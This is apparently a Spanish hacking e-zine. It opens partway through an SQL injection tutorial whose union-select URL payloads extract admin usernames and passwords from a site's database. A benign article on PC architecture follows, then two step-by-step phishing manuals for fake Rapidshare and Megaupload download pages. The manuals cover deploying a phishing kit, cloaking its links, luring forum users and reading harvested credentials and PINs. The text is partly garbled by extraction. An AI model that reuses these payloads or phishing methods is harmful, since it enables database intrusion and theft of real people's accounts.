www.web.com/noticias.php?id=-
1+union+all+select+0,1,2,3,table_name,5,6,7+from

y pones +admin , pones admin por que es la tabla importante que te ha tirado,
quedara as:

www.web.com/noticias.php?id=-
1+union+all+select+0,1,2,3,table_name,5,6,7+from+admin

& ara en table_name hay que ir probando palabras como; Login, admin,
password, clave, pass, user, email, mail , etc... Quedara a si:

www.web.com/noticias.php?id=-
1+union+all+select+0,1,2,3,admin,5,6,7+from+admin

A m el user me lo ha tirado en admin y la contrasea en clave. Ahora borras


lo que has puesto en 4, y pones :

concat(nombre,0x3a3a,pass)
Quedara a si:

www.web.com/noticias.php?id=-1+union+all+select+0,1,2,3,
concat(admin,0x3a3a,clave),5,6,7+from+admin

Os explico, admin es la tabla donde nos ha dado el usuario, 0x3a3a es :: en


hexadecimal y clave es la tabla donde nos a tirado el password.

Y Listo ya tenemos usuario y password. Ahora toca buscar el panel que para m
es lo ms difcil :P

Hasta aqu hemos llegado amigos, mucha suerte y cuidaros, nos vemos por
www.level-23.com

Autor : eDeex_
ARQUITECTURA BSICA DE UN PC
(COMPUTADOR)
Saludos lectores, desde level-23 me place escribirles :P

Antes de nada, quiero avisarles que si no les gusta el mundo de la informtica


(no creo que sea este el caso jeje) no van a poder resistir este articulo, ya que
es casi 100% terico (cosa que a casi todos, incluido yo, nos suele aborrecer).
Empecemos con el cacaomuchos de vosotros programareis, otro tantos
queris aprender a programar, pero la mayora de vosotros programareis sin
saber qu es lo que hace un PC, como funciona por dentro (no voy a explicar
que un PC tiene una placa base, un procesador, memorias RAM, discos duros
etc..eso supongo que lo sabes de serie xD) y esa es una de las claves para
programar bien y para que programar sea ms sencillo ;).
Bueno, desde tiempo memorables (yo aun no haba nacido xD), concretamente
el ao 1945 los ordenadores funcionan bsicamente estos elementos:

- CPU (Procesador): controlar y ejecutar todas las funciones de un PC


- Memoria: su principal funcin es la de almacenar datos y cdigo
(programas)
- BUS de comunicaciones: se encarga de operaciones de transferencia
principalmente
- Dispositivos de E/S: dispositivos de entrada/salida

Ahora pasar a explicar, en un orden para que todo sea comprensible y podis
unir lazos entre conceptos, los anteriores elementos.

1-Memoria:

2- BUS de comunicaciones:
La palabra BUS (lejos de referirse al peor presidente de la historia de los EEUU
jeje), nos puede recordar a el transporte pblico, no estamos mal encaminados,
pues esta es la funcin principal de el BUS, transportar operaciones. Tenemos 3
tipos de buses fundamentales:

- BUS de Datos: transporta entre procesador, memoria y/o discos duros


DATOS.
- BUS de Control: transporta informacin de control para un buen
funcionamiento de los elementos del PC.
- BUS de Direcciones: transporta la direccin virtual (direccin en memoria)
donde se tiene que acceder.

3- Dispositivos E/S:

E(entrada); S(salida) son los perifricos, pueden funcionar de 3 maneras:

- E/S programada: el perifrico realiza su operacin mientras la CPU est


100% en ese perifrica hasta que no termina su operacin.
- E/S por interrupciones: el procesador se ocupa al principio de la
operacin del perifrico y luego se dedica a otras cosas, hasta que el
perifrico termina y el mismo procesador vuelve con el perifrico para
realizar la operacin.
E/S mediante DMA: la memoria virtual se sita sobre el perifrico, lo cual libera
al procesador de la tarea de control y de estar presente en la transferencia de
datos.

Os pongo una tabla bsica de referencia en operaciones lgicas

O OP R AN OR XO
P 2 E D R
1 S
0 0 U 0 0 0
0 1 L 0 1 1
1 0 T 0 1 1
0 1 D 1 1 0
O

Pasemos a ver la unidad de registros (registrosummm, os acordis de algo??)

UNIDAD DE REGISTROS: tachn!!!! Registros, aquel eslabn mas alto en la


pirmide de memoria, de ms rpido proceso y acceso pero de menos
capacidad, ahora vamos a explicar bsicamente que son y cmo funcionan :P
Las unidades de registros permiten al procesador estar libre de acceder
siempre a memoria, y acceder a ellas ms rpidamente, pero tienen en contra el
que tienen muy poca capacidad (los que ms usaremos son de 32 bits, pero hay
de 64, de 16, etc.).
Tenemos dos tipos de registros:

- Registros de propsito general:


el programador los puede utilizar para almacenar datos, direcciones, etc.
es decir, este tipo de registros son accesible al programador. En
Ensamblador ser frecuente su uso (EAX, EBX, etc.).

- Registros de propsito especfico:


el programador no puede hace uso de ellos como haca con los de
propsito general, son usados por la CPU, en concreto por la Unidad de
Control.
Algunos ejemplos son:
IR: registro de instruccin
PC: contiene la direccin de la prxima lnea de cdigo que se
ejecutar
SR: indica el estado de alguna caracterstica de la CPU
MAR: comunica la CPU con el bus externo
MDR: comunica la CPU con el bus de datos
Como podemos ver en la imagen, los registros del micro son los
ms rpidos, pero los que menos capacidad tienen; en cambio, la
memoria secundaria (discos duros, etc.) es la ms lenta pero la
que ms capacidad de almacenamiento tiene. Entre estos dos nivel
tenemos la memoria cach y la memoria principal (RAM).
El procesador se encarga de decidir qu informacin va a los
niveles superiores (informacin que queremos que se procese
rpido) pero tarde o temprano, lo que se aloja en los niveles
superiores, al perder importancia baja a eslabones ms bajos (por
que pueden alojar ms espacio).
Bueno, ahora vamos a explicar una concepto que a la mayora os
sonar y que es parte fundamental de los sistemas operativos:

La Memoria Virtual: trata los dos niveles inferiores (memoria
principalRAM y memoria secundaria Discos duros) como uno
solo.
Todos los programas que ejecutamos, se alojan en un espacio
virtual independiente, que, mediante el control de la CPU y del SO,
no comparte con ningn otro programa.
Todo el espacio virtual se divide en pginas virtuales de 4Kb que se
estructuran en una tabla de pginas, que nos indicar donde estn
alojadas las pginas virtuales, en la memoria principal o en la
secundaria.

NOTA: todo programa, para ser ejecutado, necesita primero ser
cargado en la memoria principal (RAM).


Pgina 1
Pgina 2
Pgina 3 DISCO DURO
Pgina 4
Pgina 5
Pgina 6 RAM
Pgina 7

Bueno, llegados aqu, varios habrn abandonado ya, para los que
hayan resistido el primer asedio, ara viene el segundo!! xD
...

Ahora toca uno de los platos fuertes

4- Microprocesador (CPU):
La CPU es la que ejecuta todos los clculos y se encarga de controlar todo lo
ocurrido, es decir, es el componente central del equipo (CPUUnidad Central
de Procesos).
Consta de 3 partes fundamentales: la ALU, las unidades de registros y la unidad
de control.

Paso a explicaros estas tres partes bsicas de la CPU:

ALU: su nombre es Unidad Aritmtico-Lgica, y como su nombre indica es la


encargada de realizar operaciones aritmticas (suma, resta, divisin, etc) y
operaciones lgicas (AND,OR,XOR,NOT).
Supongo que todo el mundo sabr lo que son las operaciones aritmticas (se
estudian en la escuela, o por lo menos se intenta xD), las que puede que no
conozcis son las operaciones lgicas.
Estas son bsicamente:

- AND: hecho a dos bits (1 o 0) devuelve 1 si los dos bits son 1


- OR: devuelve 1 si uno de los bits es 1
- XOR: da uno de los dos bits si uno es 1 y el otro 0

NOT: solo trabaja con un operando, lo invierte, por ejemplo, de 0 a 1.

UNIDAD DE CONTROL: estructura la ejecucin de el cdigo, es decir,


CONTROLA la ejecucin de la instruccin actual (IR) y obtiene la siguiente (PC).
Regula el funcionamiento de la CPU.
Cuando decimos controlar decimos que sigue este proceso (as por encima):
- Cuando ejecutamos una instruccin, la unidad de control la analizar y
nos dir qu hacer con ella y donde debe ser enviada para su proceso.
Bueno, bueno, bueno, con esto ya tendris mareo garantizado para un buen rato
jejej

Si queris investigar no dudis en preguntarlo, pero antes: Google is your


friend ;)

Aqu doy por terminado el artculo este que os introducir o os aclarar el:
cmo funciona una computadora? y os dar va libre para probar nuevas
cosas :P

Imagen sacada de google

Autor : Habor

Manual Phiser Rapidshare 2009


Primero que nada debemos tener un hosting para alojar los archivos del
fake,aqui algunos free

www.justfree.com

http://www.blackapplehost.com
http://www.000webhost.com/

Rapidshare Phisher by piejustice v1.3

http://www.megaupload.com/?d=I8JL55JA

Password level-23.com

Bien una vez descargado el paquete subimos todos los archivos al hosting

Ahora editamos el rs_pie_conf.php esta parte

La primera linea es para guardar los datos de las cuentas con mas de 10000
puntos (pueden cambiar el nombre del archivo .html)

La segunda linea es para guardar los datos de las cuentas con menos de 10000
puntos (pueden cambiar el nombre del archivo .html)

La tercera linea es la pass que nos pedira para entrar en el admin y borrar links
u otras cosas (pueden cambiar el nombre )

La cuarta linea es el security lock de rapidshare mas adelante veremos para


que es y si lo quieren tener true o false (pueden cambiar el nombre )
Bien,explicado esto vamos a crear los links para eso entramos en el admin.php
en mi caso sera

http://www.level-23.com/test/admin.php

Vamos a Links Panel y ponemos Create Links le damos a Go! Aqui nos saldra
una ventana para colocar los links originales de rapidshare los pegamos asi

Le damos a Create y tendremos estos links ya modificados con nuestro hosting


Estos links ya son los buenos para poder camuflarlos con el

http://urlteam.org

O esta otra

http://lix.in

La pagina fake sera asi

Y la otra de premium sera asi


Voy hacer la preuba a ver si captura los datos xD

Para ver los datos capturados vamos al panel de admin y en Passwords Panel
ponemos View Passwords List y le damos Go!

Nos pedira la password que cambiamos al principio


Pues si funciona perfecto,ahora vamos a ver que es lo que sale una vez
introducidos los datos para descargar el link

Es para que nos regalen su unlock code si lo ponen saldra asi tambien
Account is Locked

PIN = 123654789

Y ya esta es bien facil,para que esto funcione bien y se piquen los usuarios deben de
crear post reales con el primer link de fake,me refiero a post con explicacion +
imagenes para que parezca de verdad real,ya que si ponen los datos bien se les
redirecciona a la pagina real de rapidshare para poder desxcargar el archivo real asi
no se dan ni cuenta de pasaron por un fake al principo

Autor : Xtazis

Manual Phiser Megaupload 2009

Esta claro que primero tienen que tener un hosting para poder alojar los
archivos descargados,este paso lo salto ya que seguro que lo saben
hacer,sirve cualquier hosting si no tiene publicidad mucho mejor ya que si no
nadie picara.

Nos descargamos el Phiser desde aqui


http://www.megaupload.com/?d=XHJDZIME

Pass: level-23.com

Subimos los archivos al hosting

Bien,ahora nos guiaremos por este link ya creado solo tenemos que modificarlo
a nuestro gusto para que parezca real ;la descargar

http://www.level-
23.com/test/?file_name=NOCHE2.By.MX.part01.rar&file_description=NOCHE2.
By.MX.part01.rar&file_size=93.75%20MB&downloadID=UU4MWIIU

Este ya esta preparado por m'i con los datos que le puse para hacer este
manual,lo primero que tienen que hacer es buscarse una pelicula o algun juego
que sean nuevos,digo esto por que para que la gente que tienen premium pique
la descarga debe de ser de bastantes links si solo ponen uno nadie picara eso
esta claro.Por ejemplo voy a modificar ese mismo link otra vez para que puedan
ver como se hace,primero buscamos una descarga como ya he dicho yo usare
esta
No hace falta que copien todos los links sino quieren solo es para sacarle los
datos y que parezca real...

Cogeremos el primer link de megaupload y lo ponemos en el navegador

Estos son los datos reales ahora vamos a crear el link fake con estos mismos
datos pero la url de nuestro hosting,como pueden ver estan las tres lineas
numeradas 1,2,3,copiamos el link al bloc de notas

/?file_name=TBB1988.x264.m-hd-
http://www.level-23.com/test/?file_name=TBB1988.x264.m-hd-
http://www.level-23.com/test/?file_name=
tom.720p.part0..rar &file_description= www.mhd-hdhieu.com
&file_description=www.mhd-hdhieu.com &file_size=
www.mhd-hdhieu.com&file_size= 95.78
&file_size=95.78
%20MB&downloadID=UU4MWIIU
MB%20MB&downloadID=UU4MWIIU
MB

El color verde sera la ruta de nuestro hosting

El color rojo sera el nombre que copiaremos de la descarga real

El color rosa sera la descripcion del archivo


El azul sera el tamano de la descarga

Ya tenemos el link del phiser creado ahora vamos a probarlo

Esa es la pagina fake que vera las victimas,voy a probar a ver si captura los
datos,entran en el Login
Y ahora para pder ver los datos capturados solo ponemos esto en el navegador

http://www.level-23.com/test/grabbed.html
http://www.level-23.com/test/grabbed.html

La rojo es su hosting xD

Ya tenemos los datos del primer inocente xD...ahora para camuflar la url
nuestra y que parezca mas real ya que si ven un url sospechosa como la mia
Nadie descargara y borraran el post en 2 minutos,para camuflar la url podemos
usar esta pagina

http://urlteam.org

O esta otra

http://lix.in/

Tienen que poner los links tal cual esta el fake

Link fake

http://www.level-23.com/test/?file_name=TBB1988.x264.m-hd-
tom.720p.part0..rar &file_description=www.mhd-hdhieu.com&file_size=95.78
MB%20MB&downloadID=UU4MWIIU

Link Fake camuflado

http://lix.in/-542849

Ahora vamos a entrar en ese link fake

Esta perfecto para dejarlo en algun foro,tendran que hacer eso mismo con 7 o 8
links para que parezca real la descarga de la pelicula o juego,voy a probralo a
ver si aun captura los datos con esta url camuflada
Va perfecto es asi de sencillo y rapido...

Autor : Xtazis
Gracias a todos por participar
Esteganografa (Shevchenko)
Manual Esteganograf

Manual xul (Shevchenko)

Intrusion a un Router Mediante Telnet (S top


top))
(Stop

Instalar UbuntuStudio (UnknownShadow)

Telnet y ssh (The JokeR)

frozenfew)
XSS TUNELING (Max p0wer frozenfew

frozenfew)
Introduccin a XSS (Max p0wer frozenfew
Introducci

Curso Bsico de Programacin en HTML y CSS (Ghost)


Programaci

Manual Inyeccion Sql (eDeex_)

Arquitectura de Computadores (Habor)

xtazis))
Manual Phiser Rapidshare 2009 (xtazis

xtazis))
Manual Phiser Megaupload 2009 (xtazis

www.level-23.com
Hack Tools

S-ar putea să vă placă și